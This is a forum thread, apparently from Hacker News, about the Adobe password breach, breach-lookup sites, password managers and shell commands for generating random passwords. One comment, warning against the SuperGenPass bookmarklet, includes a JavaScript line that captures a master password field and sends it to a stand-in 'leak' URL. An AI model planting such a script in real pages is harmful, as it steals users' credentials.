This should be a lesson not to manage your own passwords, use a password manager there are many to choose from. I was also caught up in the Adobe breach but my password was randomly generated by my password manager.

I am surprised by how few people are aware of this: https://www.pwdhash.com/

Convenience provided via Chrome/Firefox extensions, portability provided by the website.

I second this. I've been using it for a few years now. It gives me great peace of mind knowing that my password on a site like HN is something like "e5wLoMB1kZ". I only have to remember a few passwords and yet each site has a unique password.

Even in the event a leak of plain-text passwords I'm still secure in knowing that my other accounts won't be compromised unless there is a very determined attacker.

However, you do have to put some trust in the extension and the website. Fortunately, the website has some good credentials and the extensions have appeared clean... for now.

Yeah, I did not hear about pwdhash and it sounds like a nice idea.

One thing I have noticed though is that when one enters the same site password, you get the same "Hashed" password back to use. Yes, there is an extra step involved here so that buys you some security but I will be cautious in reusing site passwords.

Imagine an attack where for the top 100 sites in the world, all of the most commonly used passwords are used to generate the "Hashed" (pwdhash) passwords for each site and compile that info into a big list. This can then be added to the candidate list of password that can be tried in cracking leaked hashes.

The take way here is that even though pwdhash gives you domain-specific generated passwords, you will make to sure that you use a different site password as input to pwdhash for each site.

There is also http://supergenpass.com, which uses a JavaScript bookmarklet to do the hashing.

That is an extremely bad idea. Any site you use can put the following JavaScript in their site to obtain your master password next time you use the bookmarklet:

document.documentElement.addEventListener("DOMSubtreeModified", function() {$("#gp2_master").change(function() {location.href = "http://example.org/leak/" + $("#gp2_master").val()})})

You can use an enigmapass or a few of the other browser extensions to avoid this. Also there are iphone and android apps.

I like https://oneshallpass.com/ better since it lets you change some attributes about the passwords generated. So if a site is compromised you can just increment the generation field and get a totally new hash.

Is it protecting from the possibility of web sites being compromised with your data by trusting the website and the extension? How is it better?

It's a start, but you'd need all the mobile platforms on it too.

Eh, that's awesome. There's an Android app, too, so I can use this on my phone.

They don't seem to mention anywhere which hashing algorithm they use. Also, the lengths are quite small. Any idea why?

pwdhash uses a weak hashing mechanism, making it possible to brute-force master passwords. It is OK to use, but make sure that you have a cryptographically strong master password.

I generate passwords with something like:

printf "/" ; openssl rand -base64 32 | sed 's/.$//'

The leading slash was a nice tip someone gave me to not echo if you accidentally paste the password into IRC... Though if the password itself contains a slash then your client won't consider it a command and will echo it anyway, so do what you will.

Anyway, each new account gets a new password you couldn't beat out of me, though you could probably get my password safe phrase, so do what you will.

Generating long passwords like this highlights providers who enforce password length limits. Paypal's limit is ludicrously short. Hetzner's is limited too.

edit more guff.

Crap, looks like my wife's email was caught up in the Adobe breach. I think she created an account for reading ebooks with Adobe DRM downloaded from our library.

Consider this a heads up for married HN'ers, you should check their emails too.

In Australia, both my wife and I got mailed out letters from Adobe regarding our accounts being potentially compromised. Did that happen elsewhere as well?

I got an email but assumed it was a phishing attempt until I read that they were actually doing this.

Got the same one -- USA

What do you do when you are using a different computer and need to login to site?

I use a yubikey that outputs half of the password used to unlock my keypass database, the other half is in my head (so even if they steal my yubi they can't do much). The database is backed on my own owncloud which is hosted on my own vps and replicated on other 3-4 servers (all mine). My little personal cloud setup.

Call me paranoid but it took me half an hour to set it up and the monthly fees for the servers are very very low.

" … hosted on my own vps … "

Might want to think through whether that really counts as "your own". Who's got hypervisor access to the hardware? Any keys or passphrases that ever hit the disk or memory on someone else's hardware should (at least at some levels of paranoia) be considered "possibly compromised".

(I store "sensitive stuff" on AWS/DigitalOcean/other-vps-providers, but only if it's first encrypted locally and the key/passphrase never gets used/stored on the vps. EncFS works pretty well dealing with that for me... I do, though, "trust" 1Passwords datafile encryption enough to take advantage of the iOS/MacOSX sync features they've implemented over Dropbox. That's possibly not achoice I'd make i I thought I were a target of someone like the NSA.)

For some logins, the answer is "Sorry Dave, I can't do that." If I don't have the private cert, or the ssh cert, or the right hole in the firewall - there are many thing I've chosen intentionally to not be able to log in to using someone else's computer.

For lesser security critical logins, I've got my password software (1Password) on my phone (and iPad). For some intermediate level logins, I need my phone or iPad anyway, I've got TOTP two favor auth (using Google's Authenticator app) on a bunch of important stuff (Amazon/AWS, DigitalOcean, Dropbox, Guthub, the email account that all my domain names are registered with and to which password resets go, and a few other things…)

What will you do if your primary computer gets stolen?

Private SSL/TLS certs, ssh keys, and 1Password database are all stored on encrypted fiesystems (EncFS) and synced across four machines (two at work, one at home, and my laptop) using Dropbox (which is another off-site copy, and has revision archives) and/or BTSync. Those four copies are all OS X Time Machine backed up (and revision archived) - and two of those Time Machine backups are rsynced nightly to separate drives in opposite locations - so all up (not couning Dropbox) I've got copies on 10 separate spindles in two physical locations, two of them in a locked filing cabinet (the work time machine and rsync disks).

I've had a "primary computer" stolen before – and I don't intend to ever have that much grief if (when?) it happens again. I'm confident that even if all the electronics from either one of my work or home get stolen, I could be back into fully productive work-mode in half a day and one maxed-out-creditcard at the local Apple store. (If someone hits both my work and home locations simultanously, I suspect I've got bigger problems that whether I'll have angry clients shouting at me before the weekend…)

My first question would be "how often does that really happen?". It's a legitimate concern at first sight, but for me, I pretty much never need to do that since I always have my phone with me.

But if I do need to, I have 1Password on my phone as well and can get the passwords from it.

Presumably you can open your password manager's web service and do it from there.

That or use your phone. Most password managers have apps.

Ok, that makes the most sense to me.

I wouldn't want to use a webservice to look at my passwords. I want to open my password safe locally. Less likely to be snooped upon (though still possible, obviously).

I have the encrypted password file on a usb thumb drive. I remember the master password. I view as fatally flawed any password store that uploads the encrypted password file to a remote server.

If you don't mind paying a small annual fee, Lastpass is a very nice tool for automated password management across devices.

Use a browser add-on for exporting/importing passwords, transfer the exports on an encrypted USB stick.

You can have the password repository in dropbox to sync between different machines, and also use the app

You can. I would not. I don't want my password file uploaded to any remote server.

I don't. I carry my passwords (via 1Password) on my phone, so I'll just use that.

passpack.com

But I would not really be comfortable using it on an unknown computer, unless I had good knowledge that it was properly administered.

I carry a little piece of paper in my wallet that has my private key further encrypted by myself, and that encrypted key is used to decrypt other passwords through a private web/mobile app I made. The top encryption key I have is just some sort of simple algebraic mumbo jumbo formula I used to scramble my private key just a bit, and I change it up once in awhile, and have that written down. What's in my memory is how I jumbled it.

Well until the recent 4.x / 3.x screwup [1] that 1Password did it has been quite useful (and like you, my 16 character password at Adobe, even if guessed, would not be useful anywhere else)

[1] My 3.x was upgraded to 4.x on my Macbook (unbidden) and the only way to restore compatability with my 3.x on iOS is to pony up another $20. Can't go back to 3.x on the Macbook, not particularly happy about the upgrade fee on iOS.

FWIW, I think version 4 is a worthwhile upgrade on iOS, and I see the price at $9.99 at the moment (at least in the US store).

It was quite an astonishing move to break 1Password (mine is still broken) when Apple released their own free product.

  > there are many to choose from

This is the reason I don't use one... I still haven't decided which, even if _any_ is better than nothing.

... Aren't password manager the #1 target for hackers nowadays?

Imagine how much that wallet could be worth... How much bribe does the weakest 1Password engineer need?

Then use a local storage one, like password-safe (Win & Mac. password-gorilla for Linux). Combine that with spideroak, dropbox, google drive or whatever file syncing utility you want.

Anyone know what adobe's password requirements were? I don't know which password I used there: Adobe forced me to change it without letting me test the old one.

For the Adobe breach specifically, you might try the site set up by Last Pass, which checks your email against the breached data: https://lastpass.com/adobe/

The added feature is that, if your email is in the list, Last Pass will share with you how many others had your same password -- and the list of all password hints associated with that password. If more than a handful of others used the same password, that should jog your memory about which you used.

P.S. I'm not associated with Last Pass and actually use a different product. But I found this site very helpful.

This is beautiful. Thank you so much. I'd been getting really frustrated not knowing which passwords I'd needed to change but my hint was enough!

You can just torrent users.tar.gz (the leaked list of encrypted passwords) and then grep the file for your email address, which will give you the encrypted version of your password.

...which does not really help without the crypto-key - even if you know a list of possible passwords you cannot test them.

Well, funnily enough, if you know your password and it was in the leak, you can test it against your own password.

lastpass.com/adobe will show you the list of hints of yourself and other users that used the password.

Wonderful. sarcasm

> Great job, op (if you're the one who wrote this service)

Looks like no.

"Have I been pwned?" is by Troy Hunt http://www.troyhunt.com/

The OP's bio indicates that they are someone else. https://news.ycombinator.com/user?id=mountaineer

I got pwned by adobe too. Luckily password there was one of my "weak" ones, and I do not use it anywhere of importance.

Same here. I used my throw-away email to sign up at Adobe, along with my weak throw-away password. I don't have any Adobe licenses or such. The only Adobe product I use is the Flash plugin.

The email account is on Hotmail and currently has about 54k messages in its in-box, 99.9% unread. I use it to create accounts on news sites and annoying fora and such, always with the same weak password. About the only time I log into is to respond to password confirmation requests generated during account creations.

Originally, the weak password was also my email password. However, a few years ago, the email account got hacked severely, such that MSFT wouldn't let me in until I reset the password. It now has a strong password.

That's not very "lucky," it seems very intentional.

I had a very insecure password on adobe.com. i.e. low-enough entropy that 55 users had the exact same password. I figured since Adobe do not have my credit card number and there is nothing to gain by impersonating me on that site, it did not matter. I have not used the same email/password combination elsewhere, but even if I did it would only be on other low-value accounts. I'm not worried about attackers finding it by association either (they will have it already from dictionary attacks.)

I had something similar happen to one of my Windows Live accounts. Someone somehow broke into it and, although I did not have any credit card information, they decided to continue to use it. They added a stolen credit card to the account. I received an email in japanese from Xbox Live (! I have never owned an Xbox, someone converted my account, nor do I speak japanese) at one point which prompted me to call their support and figure all of this out.

But the point I'm trying to get across is, if I were unlucky that could have turned into a HUGE mess where I was accused of stealing said credit card. Luckily that did not occur (probably because they could trace it to a separate IP address.. and I don't own an Xbox). I no longer use passwords as insecure as I did for that account - I had to deal with this headache while at my family's Christmas party as well (because that is when I received the email), which made it even more irritating.

It was lucky in a sense that if adobe required complex passwords more important password would have been leaked. It was also lucky in a sense that adobe itself got hacked instead of entity that has one of my more sophisticated and thus valuable passwords.

One of my addresses was also in the Adobe breach. No idea what password I used there, but I'm fairly sure it must have been either my common "junk" password, shared with tons of forums, but nothing that poses any serious risk to me (just to those forums). Or if they had stricter requirements, some variation on it that I always forget, so I have to ask them for a new password every time anyway.

I certainly don't reuse financial or email passwords. Or actually I do, but only for financial and email stuff. But I probably shouldn't reuse them at all.

But those forums? I'm just not going to keep track of a new password for every site I visit.

If you're using a forum, outré in front of a computer. Keeping track of things is one of the things computers are _best_ at. Get yourself a password manager. I use 1Password, but I hear good things about KeyPass and LastPass too.

Seriously - you can't manage 2013 grade password complexity requirements for all the places you need passwords in your head any more (it's likely you never could…)

Get a tool to help, computers are wonderful tools.

I've got KeePass, but I haven't used it remotely as long as I've used many websites. Also, I don't have my KeePass DB in Dropbox, so I can't access it from other computers.

More than that, I'd rather not put my KeePass DB on someone else's machine in the first place. But I'll easily trust strange computers with a password for some crappy forum.

There's always something you risk compromising. I prefer some forum account to be compromised.

My wife was on the Adobe list, the same credit card she used at Adobe was charged from Amazon or paypal ( I can't remember which ) couple of weeks after the leak. She called the bank they closed it right away and took the charges off the card.

I woke up this Thanksgiving with a bunch of email notifications from Paypal that my account had been hacked and taken over. I (also shame on me) tend to reuse some of my passwords, and figured someone got into my Paypal account using my adobe credentials, not even being sure if I had created an account with adobe for anything in the past.

I checked my email address on this site and it didn't find any pwnage.

I'm relieved my email address isn't in any of these leaks, but also now concerned about whatever it was that let someone into my paypal account so easily...

If you reuse passwords, separate throw-away accounts (like Adobe or pretty much anything that's not your email, your bank or PayPal), from the important stuff.

Sites that need to be secure, hopefully really are secure. Sites that don't really need to be secure because they don't deal in anything of value, probably don't invest quite as much in security. Reusing passwords across those different kinds of sites means the extra security of the secure sites is wasted.

Of course it's way better not to reuse at all, but remembering two or three passwords is a lot easier than dozens, and still a lot safer than just one.

> Looks like I got caught up in the adobe breach.

I knew I was, but I was delighted by what Dreamhost did: they have cross-checked their users' e-mails with the Adobe leaked database and sent a message [1] to affected users explaining the situation and advising to change the passowrd, reminding to not re-use passwords and suggesting password vaults.

I think it's a great thing to do by third-parties when leaks of this magnitude happen.

[1] Full text: http://pastebin.com/2AkU0v98

Have fun closing your account by the way, I went through that fiasco recently. I regularly run the LastPass security challenge and an old email of mine was in the Adobe breach too.

49 customers are in line ahead of you. ..5 mins.. 48 customers are in line ahead of you. ..5 mins.. 48 customers are in line ahead of you. ..5 mins.. 48 customers are in line ahead of you. ARG!

After the Macrumors breach (I had only signed up about 2 weeks before it happened), I decided it was time to make all my passwords unique and to use a credentials manager like 1Password. I too shared the same password for multiple sites/services (shame on me too).

Fuck me. Ditto. The reason I checked? I unknowingly, until today, had a domain name transferred away from me -- or rather, ownership changed, for a domain I bought years ago for $3,000. Email address used for that domain in Adobe breach.

Looks like I was caught in Adobe breach as well. Luckily I use one off passwords for each site I log into. Damn.

Yahoo here. How the hell did the hackers get the passwords in plain text? Were they seriously unencrypted?

They were encrypted, but with no variation between the hashes for per email. https://lastpass.com/adobe/ will show you the password hints associated with the (in my case) 200 people with the same (hashed) password. The clues would be sufficient to guess the password.

I've gone to generating a unique password with a simple random number generator if the end site supports password recovery (in case Chrome's password memorizing system forgets it).

#!/bin/bash if [ $1 ] ; then a=$1 else a=16 fi dd if=/dev/urandom bs=1000 count=1 2>/dev/null | tr -d -c "[:alnum:]" | tr -d '`' | tr -d "'" | tr -d '"' | tr -d '\\' | head -c $a echo

This is not meant as criticism: Is there any particular reason for all the tr pipes? Is there any advantage to using tr instead of base64?

I essentially use the following:

  base64 </dev/urandom | head -c $COUNT | xargs -0

Criticism welcome. Yours is nicer.

I use this for a little more entropy:

    LANG=C tr -dc "[:print:]" < /dev/urandom | fold -w 32 | head -n 1

I much prefer using the program `pwgen`. It's installed on all my Linux boxes and it's available from Cygwin too, and it generates a 'pronounceable' password, which makes it a lot easier to remember and also much easier to copy.

There's also the benefit of fewer moving parts -- with a pipeline like that, I'd be worried about accidentally stripping out some of the randomness. I'm fairly confident that a simple invocation of `pwgen` will work.

Mine showed for Adobe as well, but I don't have an account with Adobe?